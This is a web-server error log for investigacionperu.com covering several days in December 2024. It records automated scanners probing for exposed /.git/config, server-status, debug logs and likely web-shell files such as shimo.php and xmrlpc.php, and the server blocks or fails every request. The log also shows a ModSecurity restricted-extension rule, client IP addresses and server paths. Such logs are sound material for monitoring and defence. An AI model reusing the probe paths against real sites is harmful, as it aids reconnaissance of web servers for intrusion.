6093#6093: *247153 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /shared/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 6093#6093: *247152 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 6094#6094: *247154 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 6093#6093: *247155 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /cache/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 6093#6093: *247156 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /env/.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/02 17:22:09 [error] 6094#6094: *247157 access forbidden by rule, client: 179.43.189.138, server: investigacionperu.com, request: "GET /dist/.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Dec 02 23:49:25.852038 2024] [authz_core:error] [pid 6702:tid 140420612916992] [client 159.89.12.166:43556] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/02 23:49:30 [error] 6093#6093: *253192 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Dec 03 14:06:07.414240 2024] [:error] [pid 27738:tid 140459423508224] [client 20.14.136.236:36832] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Tue Dec 03 14:06:40.027500 2024] [autoindex:error] [pid 27738:tid 140459440293632] [client 20.14.136.236:37202] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 14:07:12.053294 2024] [autoindex:error] [pid 27086:tid 140459280148224] [client 20.14.136.236:37588] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 14:07:15.450544 2024] [autoindex:error] [pid 27738:tid 140459296933632] [client 20.14.136.236:37642] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 14:07:16.819382 2024] [:error] [pid 27738:tid 140459196221184] [client 20.14.136.236:37662] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Dec 03 14:07:23.285489 2024] [:error] [pid 27086:tid 140459280148224] [client 20.14.136.236:37736] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/1.php [Tue Dec 03 14:07:23.309519 2024] [:error] [pid 27086:tid 140459196221184] [client 20.14.136.236:37740] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shimo.php [Tue Dec 03 14:07:26.561637 2024] [:error] [pid 27738:tid 140459406722816] [client 20.14.136.236:37780] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Tue Dec 03 14:07:47.944639 2024] [autoindex:error] [pid 27738:tid 140459196221184] [client 20.14.136.236:37972] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 14:07:47.976633 2024] [:error] [pid 27738:tid 140459238184704] [client 20.14.136.236:37974] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Dec 03 14:07:50.294283 2024] [:error] [pid 27084:tid 140459179435776] [client 20.14.136.236:37998] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Tue Dec 03 16:16:46.453956 2024] [autoindex:error] [pid 27084:tid 140459179435776] [client 45.134.225.130:41372] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:47.509641 2024] [autoindex:error] [pid 27738:tid 140459313719040] [client 45.134.225.130:41374] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:48.569347 2024] [autoindex:error] [pid 27738:tid 140459305326336] [client 45.134.225.130:41376] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:49.492614 2024] [autoindex:error] [pid 27085:tid 140459229792000] [client 45.134.225.130:41378] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:50.522381 2024] [autoindex:error] [pid 27738:tid 140459415115520] [client 45.134.225.130:41380] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:51.394569 2024] [autoindex:error] [pid 27738:tid 140459448686336] [client 45.134.225.130:41382] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:52.352437 2024] [autoindex:error] [pid 27738:tid 140459406722816] [client 45.134.225.130:41384] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:16:53.443596 2024] [autoindex:error] [pid 27086:tid 140459204613888] [client 45.134.225.130:41386] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:38.929860 2024] [autoindex:error] [pid 27085:tid 140459263362816] [client 45.134.225.130:41428] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:39.760719 2024] [:error] [pid 27085:tid 140459431900928] [client 45.134.225.130:41430] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Dec 03 16:19:39.760976 2024] [:error] [pid 27085:tid 140459431900928] [client 45.134.225.130:41430] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Dec 03 16:19:39.761149 2024] [:error] [pid 27085:tid 140459431900928] [client 45.134.225.130:41430] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Dec 03 16:19:39.761360 2024] [:error] [pid 27085:tid 140459431900928] [client 45.134.225.130:41430] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Tue Dec 03 16:19:40.677773 2024] [autoindex:error] [pid 27085:tid 140459398330112] [client 45.134.225.130:41432] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:41.372177 2024] [autoindex:error] [pid 27085:tid 140459288540928] [client 45.134.225.130:41434] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:42.282146 2024] [autoindex:error] [pid 27085:tid 140459305326336] [client 45.134.225.130:41436] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:43.261073 2024] [autoindex:error] [pid 27085:tid 140459187828480] [client 45.134.225.130:41438] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:19:43.990835 2024] [autoindex:error] [pid 27085:tid 140459313719040] [client 45.134.225.130:41440] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/03 16:22:27 [error] 27046#27046: *269353 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Tue Dec 03 16:31:25.018034 2024] [autoindex:error] [pid 27738:tid 140459179435776] [client 45.134.225.130:41634] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 16:37:02.247099 2024] [autoindex:error] [pid 27738:tid 140459423508224] [client 45.134.225.130:41730] AH01276: Cannot serve directory /home/investig/public_html/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Dec 03 18:49:01.389435 2024] [:error] [pid 27084:tid 140459448686336] [client 45.134.225.130:43700] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class.api.php [Tue Dec 03 18:49:40.306545 2024] [:error] [pid 27084:tid 140459440293632] [client 45.134.225.130:43720] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class.api.php [Wed Dec 04 02:41:21.261508 2024] [:error] [pid 27084:tid 140459204613888] [client 45.134.225.130:51908] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/x.php, referer: www.google.com [Wed Dec 04 02:43:44.068203 2024] [authz_core:error] [pid 27085:tid 140459423508224] [client 64.227.70.2:51980] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/04 02:43:47 [error] 27046#27046: *275713 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Dec 04 06:36:23.235770 2024] [:error] [pid 606:tid 140676612155136] [client 45.134.225.130:57506] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Wed Dec 04 06:38:00.485532 2024] [:error] [pid 603:tid 140676654118656] [client 45.134.225.130:57536] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Wed Dec 04 07:41:38.411370 2024] [:error] [pid 607:tid 140676603762432] [client 150.136.112.62:58624] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Dec 04 07:41:47.807991 2024] [:error] [pid 1212:tid 140676637333248] [client 150.136.112.62:58660] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:41:47.823444 2024] [:error] [pid 606:tid 140676628940544] [client 150.136.112.62:58662] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:42:14.171358 2024] [autoindex:error] [pid 607:tid 140676662511360] [client 150.136.112.62:58760] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:42:19.988875 2024] [:error] [pid 1212:tid 140676746438400] [client 150.136.112.62:58784] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:42:20.566756 2024] [autoindex:error] [pid 1212:tid 140676637333248] [client 150.136.112.62:58788] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:42:21.119842 2024] [autoindex:error] [pid 1212:tid 140676570191616] [client 150.136.112.62:58792] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:42:24.692256 2024] [:error] [pid 603:tid 140676679296768] [client 150.136.112.62:58806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Dec 04 07:42:24.709788 2024] [:error] [pid 606:tid 140676570191616] [client 150.136.112.62:58808] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Dec 04 07:42:57.355369 2024] [:error] [pid 603:tid 140676729652992] [client 150.136.112.62:58928] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Dec 04 07:43:06.661180 2024] [:error] [pid 1212:tid 140676628940544] [client 150.136.112.62:58960] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:43:06.670996 2024] [:error] [pid 606:tid 140676628940544] [client 150.136.112.62:58962] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:43:33.224639 2024] [autoindex:error] [pid 606:tid 140676595369728] [client 150.136.112.62:59054] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:43:39.540788 2024] [:error] [pid 606:tid 140676712867584] [client 150.136.112.62:59076] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Dec 04 07:43:40.072758 2024] [autoindex:error] [pid 1212:tid 140676620547840] [client 150.136.112.62:59080] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:43:40.627112 2024] [autoindex:error] [pid 1212:tid 140676595369728] [client 150.136.112.62:59084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 07:43:45.033442 2024] [:error] [pid 607:tid 140676654118656] [client 150.136.112.62:59098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Dec 04 07:43:45.047628 2024] [:error] [pid 606:tid 140676704474880] [client 150.136.112.62:59100] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Dec 04 08:55:57.909521 2024] [autoindex:error] [pid 1212:tid 140676578584320] [client 45.134.225.130:60386] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 08:55:58.994325 2024] [autoindex:error] [pid 607:tid 140676578584320] [client 45.134.225.130:60388] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 08:56:08.620680 2024] [autoindex:error] [pid 1212:tid 140676570191616] [client 45.134.225.130:60408] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/12/04 08:56:10 [error] 550#550: *281892 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/12/04 08:56:11 [error] 550#550: *281893 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.134.225.130, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Wed Dec 04 08:56:12.962877 2024] [autoindex:error] [pid 606:tid 140676603762432] [client 45.134.225.130:60410] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Dec 04 17:33:29.283513 2024] [authz_core:error] [pid 607:tid 140676561798912] [client 142.93.129.190:44044] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/04 17:33:33 [error] 550#550: *287206 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Dec 05 02:21:36.113207 2024] [:error] [pid 1212:tid 140676628940544] [client 178.249.209.164:51648] [client 178.249.209.164] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/debug.log"] [unique_id "Z1FUgG8VtDhfzyOSFTY4qgAAANA"] 2024/12/05 02:25:44 [error] 551#551: *292152 access forbidden by rule, client: 149.137.247.4, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/05 13:09:34 [error] 7424#7424: *299080 access forbidden by rule, client: 44.213.110.25, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Dec 05 13:18:36.548713 2024] [autoindex:error] [pid 7458:tid 140000700036864] [client 154.38.168.64:34754] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 05 13:18:37.663094 2024] [autoindex:error] [pid 7457:tid 140000817534720] [client 154.38.168.64:34758] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Dec 05 15:52:08.963452 2024] [autoindex:error] [pid 8073:tid 140000809142016] [client 74.225.212.135:38254] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 06 16:01:38.449529 2024] [authz_core:error] [pid 14272:tid 140311875512064] [client 147.182.200.94:40848] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/06 16:01:42 [error] 14136#14136: *320314 access forbidden by rule, client: 147.182.200.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Dec 06 17:18:01.556782 2024] [:error] [pid 14830:tid 140311841941248] [client 20.169.232.142:43258] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Dec 06 17:18:15.081109 2024] [:error] [pid 14271:tid 140311758014208] [client 20.169.232.142:43290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Dec 06 17:18:15.092876 2024] [:error] [pid 14271:tid 140311883904768] [client 20.169.232.142:43292] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Dec 06 17:18:46.791817 2024] [autoindex:error] [pid 14272:tid 140311799977728] [client 20.169.232.142:43390] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Dec 06 17:18:54.952441 2024] [:error] [pid 14270:tid 140311909082880] [client 20.169.232.142:43416] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Dec 06 17:18:55.732807 2024] [autoindex:error] [pid 14272:tid 140311833548544] [client 20.169.232.142:43420] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Dec 06 17:18:56.542728 2024] [autoindex:error] [pid 14272:tid 140311758014208] [client 20.169.232.142:43424] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Dec 06 17:19:02.155431 2024] [:error] [pid 14270:tid 140311799977728] [client 20.169.232.142:43438] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Dec 06 17:19:02.165769 2024] [:error] [pid 14270:tid 140311791585024] [client 20.169.232.142:43440] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 